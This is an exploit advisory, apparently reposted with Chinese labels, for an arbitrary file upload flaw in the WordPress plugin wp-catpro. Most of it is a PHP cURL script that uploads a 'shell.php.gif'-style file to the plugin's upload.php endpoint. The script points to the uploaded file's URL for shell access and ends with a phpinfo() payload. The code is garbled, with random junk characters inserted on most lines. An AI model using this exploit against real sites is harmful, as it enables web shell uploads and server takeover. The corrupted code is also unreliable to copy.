WordPress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
作者 => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png") // Allowed file extensions
# "/uploads/"; // The path where we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------
#=> Exploit
-----------
! C {% W4 @: \3 o<?php
7 Z4 q- B1 q, r# ]4 a/ G- g
7 F& z7 D2 ^/ o6 P( m1 |$uploadfile="zik.php.gif";/ d' f" J6 ^- q5 P" Q
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
0 a$ |8 d- c3 E, Q6 z4 L6 b; scurl_setopt($ch, CURLOPT_POST, true);' z7 i& s8 m, G# o8 M- O; f
curl_setopt($ch, CURLOPT_POSTFIELDS,
6 O6 B( E+ E$ j- darray('Filedata'=>"@$uploadfile",
- j8 e( t+ f" }, y4 V6 J$ F0 v& m'folder'=>'/wp-content/uploads/catpro/'));
2 {) ], @1 f; w# T, c. n' ~curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);; K6 S7 U) n8 e, q! ^
$postResult = curl_exec($ch);* y K2 M, D& q8 Q/ ~- T
curl_close($ch);* h" x+ D( L) C5 C
0 \, G5 @+ ^* Q8 G0 V O( b6 N- Lprint "$postResult";
. N' ^+ R6 K; [* m0 ^
8 C0 y+ O8 \" w$ i2 H& }; |Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
8 y6 [. K1 g/ { ?>6 w& I4 g$ t: J, p% a1 ~8 ?
<?php. n+ S! S3 a- C
phpinfo();
7 O+ M8 m y Y7 e; G& G6 G?> |